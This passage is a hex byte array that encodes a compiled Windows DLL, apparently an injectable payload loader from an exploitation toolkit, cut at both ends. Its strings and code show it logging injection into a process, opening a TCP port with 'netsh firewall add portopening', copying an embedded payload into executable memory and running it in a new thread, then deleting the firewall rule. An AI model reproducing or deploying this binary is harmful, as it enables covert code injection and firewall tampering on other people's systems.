0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x40,0x00,0x00,0xc8,0x00,0x00,0x00,0x70,0x20,0x00,0x00,0x1c,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x70,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00, 0x76,0x05,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x04,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60, 0x2e,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x11,0x07,0x00,0x00,0x00,0x20,0x00,0x00, 0x00,0x08,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00, 0x2b,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x12,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc0, 0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xde,0x00,0x00,0x00,0x00,0x40,0x00,0x00, 0x00,0x02,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xff,0x54,0x24,0x04,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x81,0xec,0x1c,0x01,0x00,0x00,0x56,0x57,0xc7,0x85,0xe8,0xfe,0xff, 0xff,0x00,0x00,0x00,0x00,0xff,0x15,0x24,0x20,0x00,0x10,0x50,0xff,0x15,0x20,0x20, 0x00,0x10,0x50,0x68,0x8c,0x20,0x00,0x10,0x6a,0x16,0x68,0xb0,0x20,0x00,0x10,0xe8, 0x7c,0x03,0x00,0x00,0x83,0xc4,0x14,0x68,0x5c,0x11,0x00,0x00,0x68,0xc0,0x20,0x00, 0x10,0x6a,0x1a,0x68,0xf8,0x20,0x00,0x10,0xe8,0x63,0x03,0x00,0x00,0x83,0xc4,0x10, 
0x68,0x5c,0x11,0x00,0x00,0x68,0x08,0x21,0x00,0x10,0x8d,0x85,0xf0,0xfe,0xff,0xff, 0x50,0xff,0x15,0x64,0x20,0x00,0x10,0x83,0xc4,0x0c,0x6a,0x00,0x8d,0x8d,0xf0,0xfe, 0xff,0xff,0x51,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b, 0x95,0xec,0xfe,0xff,0xff,0x52,0x68,0x40,0x21,0x00,0x10,0x6a,0x21,0x68,0x64,0x21, 0x00,0x10,0xe8,0x19,0x03,0x00,0x00,0x83,0xc4,0x10,0x6a,0x40,0x68,0x00,0x30,0x00, 0x00,0x68,0x2b,0x01,0x00,0x00,0x6a,0x00,0xff,0x15,0x18,0x20,0x00,0x10,0x89,0x45, 0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xa1,0x00,0x00,0x00,0x8b,0x45,0xfc,0x50,0x68, 0x2b,0x01,0x00,0x00,0x68,0x74,0x21,0x00,0x10,0x6a,0x28,0x68,0xac,0x21,0x00,0x10, 0xe8,0xdb,0x02,0x00,0x00,0x83,0xc4,0x14,0xb9,0x4a,0x00,0x00,0x00,0xbe,0x00,0x30, 0x00,0x10,0x8b,0x7d,0xfc,0xf3,0xa5,0x66,0xa5,0xa4,0x6a,0x00,0x6a,0x00,0x8b,0x4d, 0xfc,0x51,0x68,0x00,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00, 0x10,0x89,0x85,0xe4,0xfe,0xff,0xff,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x00,0x74,0x1e, 0x6a,0xff,0x8b,0x95,0xe4,0xfe,0xff,0xff,0x52,0xff,0x15,0x10,0x20,0x00,0x10,0x8b, 0x85,0xe4,0xfe,0xff,0xff,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15, 0x08,0x20,0x00,0x10,0x50,0x68,0xbc,0x21,0x00,0x10,0x6a,0x38,0x68,0xd8,0x21,0x00, 0x10,0xe8,0x6a,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x00,0x80,0x00,0x00,0x6a,0x00, 0x8b,0x4d,0xfc,0x51,0xff,0x15,0x30,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,0x08,0x20, 0x00,0x10,0x50,0x68,0xe8,0x21,0x00,0x10,0x6a,0x3f,0x68,0x04,0x22,0x00,0x10,0xe8, 0x3c,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x14,0x22,0x00,0x10,0x6a,0x43,0x68,0x40, 0x22,0x00,0x10,0xe8,0x28,0x02,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x68,0x50,0x22, 0x00,0x10,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,0x95, 0xec,0xfe,0xff,0xff,0x52,0x68,0x90,0x22,0x00,0x10,0x6a,0x45,0x68,0xb4,0x22,0x00, 0x10,0xe8,0xfa,0x01,0x00,0x00,0x83,0xc4,0x10,0x68,0xc4,0x22,0x00,0x10,0x6a,0x47, 0x68,0xd8,0x22,0x00,0x10,0xe8,0xe6,0x01,0x00,0x00,0x83,0xc4,0x0c,0xff,0xb5,0xe8, 
0xfe,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,0xff,0x75,0x08,0xff,0x35,0x5c, 0x20,0x00,0x10,0xa1,0x30,0x20,0x00,0x10,0xff,0xe0,0x8b,0x85,0xe8,0xfe,0xff,0xff, 0x5f,0x5e,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x56,0x8b,0x74,0x24,0x08,0x57,0x8b,0x7c,0x24,0x14,0x33,0xc0,0x85,0xff,0x76,0x08, 0x88,0x04,0x30,0x40,0x3b,0xc7,0x72,0xf8,0x33,0xc0,0x85,0xff,0x76,0x13,0x8a,0x4c, 0x24,0x10,0x8a,0x14,0x30,0x32,0xd0,0x02,0xd1,0x88,0x14,0x30,0x40,0x3b,0xc7,0x72, 0xf1,0x5f,0x5e,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x8b,0x44,0x24,0x08,0x81,0xec,0x10,0x02,0x00,0x00,0x83,0xe8,0x01,0x0f,0x85,0xe4, 0x00,0x00,0x00,0x56,0x57,0x68,0x04,0x01,0x00,0x00,0x8d,0x84,0x24,0x18,0x01,0x00, 0x00,0x50,0x6a,0x00,0xc7,0x44,0x24,0x18,0x04,0x01,0x00,0x00,0xff,0x15,0x58,0x20, 0x00,0x10,0x50,0xff,0x15,0x2c,0x20,0x00,0x10,0x8d,0x4c,0x24,0x0c,0x51,0x8d,0x54, 0x24,0x14,0x52,0xff,0x15,0x00,0x20,0x00,0x10,0x8d,0x44,0x24,0x10,0x50,0xff,0x15, 0x20,0x20,0x00,0x10,0x50,0x8d,0x8c,0x24,0x1c,0x01,0x00,0x00,0x51,0x68,0xe8,0x22, 0x00,0x10,0x6a,0x7e,0x68,0x28,0x23,0x00,0x10,0xe8,0x02,0x01,0x00,0x00,0x8b,0xbc, 0x24,0x34,0x02,0x00,0x00,0x8b,0x77,0x3c,0x83,0xc4,0x18,0x8d,0x54,0x24,0x08,0x52, 0x03,0xf7,0xc7,0x44,0x24,0x0c,0x00,0x00,0x00,0x00,0x8b,0x46,0x54,0x6a,0x04,0x50, 0x57,0xff,0x15,0x28,0x20,0x00,0x10,0x85,0xc0,0x74,0x0f,0x8b,0x4e,0x54,0x51,0x6a, 0x00,0x57,0xe8,0x19,0xff,0xff,0xff,0x83,0xc4,0x0c,0x6a,0x00,0x6a,0x00,0x57,0x68, 0x10,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,0x10,0x5f,0x5e, 0x85,0xc0,0x74,0x15,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xb8,0x01,0x00,0x00,0x00, 0x81,0xc4,0x10,0x02,0x00,0x00,0xc2,0x0c,0x00,0xff,0x15,0x08,0x20,0x00,0x10,0x50, 0x68,0x38,0x23,0x00,0x10,0x68,0x94,0x00,0x00,0x00,0x68,0x54,0x23,0x00,0x10,0xe8, 0x7c,0x00,0x00,0x00,0x83,0xc4,0x10,0xb8,0x01,0x00,0x00,0x00,0x81,0xc4,0x10,0x02, 0x00,0x00,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 
0x6a,0x40,0x68,0x64,0x23,0x00,0x10,0x68,0x6c,0x23,0x00,0x10,0x6a,0x00,0xff,0x15, 0x68,0x20,0x00,0x10,0x6a,0x00,0xff,0x15,0x34,0x20,0x00,0x10,0xcc,0xcc,0xcc,0xcc, 0x53,0x8b,0x1d,0x38,0x20,0x00,0x10,0x55,0x56,0x57,0x8b,0x7c,0x24,0x14,0x57,0x8b, 0xef,0x33,0xf6,0xff,0xd3,0x85,0xc0,0x7e,0x1e,0x8d,0xa4,0x24,0x00,0x00,0x00,0x00, 0x8a,0x04,0x3e,0x3c,0x5c,0x74,0x04,0x3c,0x2f,0x75,0x04,0x8d,0x6c,0x3e,0x01,0x57, 0x46,0xff,0xd3,0x3b,0xf0,0x7c,0xe9,0x5f,0x5e,0x8b,0xc5,0x5d,0x5b,0xc3,0xcc,0xcc, 0x51,0x56,0x8b,0x35,0x54,0x20,0x00,0x10,0x57,0x68,0x7c,0x23,0x00,0x10,0x68,0x84, 0x23,0x00,0x10,0xff,0xd6,0x8b,0x3d,0x50,0x20,0x00,0x10,0x50,0xff,0xd7,0x89,0x44, 0x24,0x08,0x85,0xc0,0x0f,0x84,0xf1,0x00,0x00,0x00,0x55,0x68,0x90,0x23,0x00,0x10, 0x68,0x9c,0x23,0x00,0x10,0xff,0xd6,0x50,0xff,0xd7,0x8b,0xe8,0x85,0xed,0x0f,0x84, 0xd6,0x00,0x00,0x00,0x68,0xa8,0x23,0x00,0x10,0x68,0xb4,0x23,0x00,0x10,0xff,0xd6, 0x50,0xff,0xd7,0x85,0xc0,0x0f,0x84,0xbf,0x00,0x00,0x00,0x8b,0x54,0x24,0x1c,0x53, 0x8d,0x4c,0x24,0x24,0x51,0x52,0xff,0xd0,0x8b,0x1d,0x4c,0x20,0x00,0x10,0x8b,0xf8, 0x83,0xc4,0x08,0x81,0xc7,0x00,0x01,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf0, 0x85,0xf6,0x0f,0x84,0x91,0x00,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf8,0x85, 0xff,0x75,0x0d,0x56,0xff,0x15,0x48,0x20,0x00,0x10,0x5b,0x5d,0x5f,0x5e,0x59,0xc3, 0x8b,0x4c,0x24,0x20,0x8d,0x44,0x24,0x24,0x50,0x51,0x56,0xff,0xd5,0x8b,0x54,0x24, 0x28,0x8b,0x44,0x24,0x24,0x83,0xc4,0x0c,0x56,0x52,0x50,0xe8,0x00,0xff,0xff,0xff, 0x83,0xc4,0x04,0x50,0xff,0x15,0x20,0x20,0x00,0x10,0x50,0x68,0xc0,0x23,0x00,0x10, 0x57,0xff,0x54,0x24,0x28,0x83,0xc4,0x18,0x57,0xff,0x15,0x44,0x20,0x00,0x10,0x6a, 0xf5,0xff,0x15,0x40,0x20,0x00,0x10,0x8b,0xd8,0x83,0xfb,0xff,0x74,0x1f,0x6a,0x00, 0x8d,0x4c,0x24,0x14,0x51,0x56,0xc7,0x44,0x24,0x1c,0x00,0x00,0x00,0x00,0xff,0x15, 0x38,0x20,0x00,0x10,0x50,0x56,0x53,0xff,0x15,0x3c,0x20,0x00,0x10,0x57,0x8b,0x3d, 0x48,0x20,0x00,0x10,0xff,0xd7,0x56,0xff,0xd7,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,0xcc, 
0xff,0x25,0x5c,0x20,0x00,0x10,0xff,0x25,0x30,0x20,0x00,0x10,0xff,0x25,0x08,0x20, 0x00,0x10,0xff,0x25,0x0c,0x20,0x00,0x10,0xff,0x25,0x10,0x20,0x00,0x10,0xff,0x25, 0x14,0x20,0x00,0x10,0xff,0x25,0x18,0x20,0x00,0x10,0xff,0x25,0x1c,0x20,0x00,0x10, 0xff,0x25,0x20,0x20,0x00,0x10,0xff,0x25,0x24,0x20,0x00,0x10,0xff,0x25,0x28,0x20, 0x00,0x10,0xff,0x25,0x2c,0x20,0x00,0x10,0xff,0x25,0x58,0x20,0x00,0x10,0xff,0x25, 0x34,0x20,0x00,0x10,0xff,0x25,0x38,0x20,0x00,0x10,0xff,0x25,0x3c,0x20,0x00,0x10, 0xff,0x25,0x40,0x20,0x00,0x10,0xff,0x25,0x44,0x20,0x00,0x10,0xff,0x25,0x48,0x20, 0x00,0x10,0xff,0x25,0x4c,0x20,0x00,0x10,0xff,0x25,0x50,0x20,0x00,0x10,0xff,0x25, 0x54,0x20,0x00,0x10,0xff,0x25,0x64,0x20,0x00,0x10,0xff,0x25,0x68,0x20,0x00,0x10, 0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00, 0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00, 0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00, 0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00, 0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00, 0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00, 
0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00, 0x61,0x00,0x00,0x00,0xb0,0x26,0x00,0x00,0xb0,0x10,0x00,0x00,0x4d,0x61,0x69,0x6e, 0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x54,0x68,0x72,0x65,0x61,0x64, 0x20,0x25,0x78,0x3a,0x25,0x78,0x20,0x73,0x74,0x61,0x72,0x74,0x65,0x64,0x0a,0x00, 0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x41,0x64, 0x64,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x72,0x75, 0x6c,0x65,0x20,0x66,0x6f,0x72,0x20,0x54,0x43,0x50,0x20,0x70,0x6f,0x72,0x74,0x20, 0x25,0x64,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20, 0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c, 0x6c,0x20,0x61,0x64,0x64,0x20,0x70,0x6f,0x72,0x74,0x6f,0x70,0x65,0x6e,0x69,0x6e, 0x67,0x20,0x54,0x43,0x50,0x20,0x25,0x64,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f, 0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25, 0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x25,0x64,0x20,0x62, 0x79,0x74,0x65,0x73,0x20,0x66,0x6f,0x72,0x20,0x70,0x61,0x79,0x6c,0x6f,0x61,0x64, 0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c, 0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61, 0x74,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52, 0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 
0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x41, 0x6c,0x6c,0x6f,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a, 0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x44,0x65,0x6c,0x65,0x74,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77, 0x61,0x6c,0x6c,0x20,0x72,0x75,0x6c,0x65,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x00,0x00, 0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00, 0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68, 0x20,0x61,0x64,0x76,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x66,0x69,0x72, 0x65,0x77,0x61,0x6c,0x6c,0x20,0x64,0x65,0x6c,0x65,0x74,0x65,0x20,0x72,0x75,0x6c, 0x65,0x20,0x6e,0x61,0x6d,0x65,0x3d,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x00,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f, 0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25, 0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x45,0x58,0x49,0x54,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x28, 0x29,0x3a,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x65,0x64,0x20,0x69,0x6e,0x74,0x6f, 0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x22,0x25,0x73,0x22,0x20,0x28,0x50, 0x49,0x44,0x3d,0x25,0x64,0x29,0x2c,0x20,0x55,0x73,0x65,0x72,0x20,0x3d,0x20,0x22, 0x25,0x73,0x22,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x54,0x68, 0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a, 0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 
0x70,0x00,0x00,0x00,0x44,0x75,0x6d,0x6d,0x79,0x28,0x29,0x00,0x3c,0x4f,0x4b,0x3e, 0x20,0x74,0x6f,0x20,0x65,0x78,0x69,0x74,0x2e,0x2e,0x2e,0x00,0x73,0x70,0x72,0x69, 0x6e,0x74,0x66,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x76,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x00,0x00,0x00,0x6d,0x73,0x76,0x63, 0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5f,0x76,0x73,0x63,0x70,0x72,0x69,0x6e, 0x74,0x66,0x00,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x5b,0x25,0x2e,0x35,0x64,0x5d,0x20,0x2e,0x5c,0x25,0x73,0x28,0x25,0x64,0x29,0x20, 0x3a,0x20,0x25,0x73,0x00,0x00,0x00,0x00,0x30,0x24,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x02,0x26,0x00,0x00,0x08,0x20,0x00,0x00,0x8c,0x24,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2a,0x26,0x00,0x00,0x64,0x20,0x00,0x00, 0x28,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x26,0x00,0x00, 0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00, 0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00, 0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00, 0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00, 0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00, 0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00, 0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00, 0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x01,0x45,0x78,0x69,0x74,0x54,0x68, 0x72,0x65,0x61,0x64,0x00,0x00,0x57,0x04,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x46, 0x72,0x65,0x65,0x00,0xe6,0x01,0x47,0x65,0x74,0x4c,0x61,0x73,0x74,0x45,0x72,0x72, 0x6f,0x72,0x00,0x00,0x43,0x00,0x43,0x6c,0x6f,0x73,0x65,0x48,0x61,0x6e,0x64,0x6c, 0x65,0x00,0x64,0x04,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x53,0x69,0x6e,0x67,0x6c, 
